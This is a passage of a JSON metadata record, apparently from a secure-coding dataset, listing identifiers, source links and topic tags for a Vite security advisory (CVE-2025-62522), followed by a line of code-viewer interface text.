"published_at": "2025-10-20T19:54:28Z",
"updated_at": "2026-02-04T04:13:38.886554Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-62522",
"https://github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-62522",
"GHSA-93m4-6634-74q7"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
}
}
在新工单中引用 查看 Git Blame 复制永久链接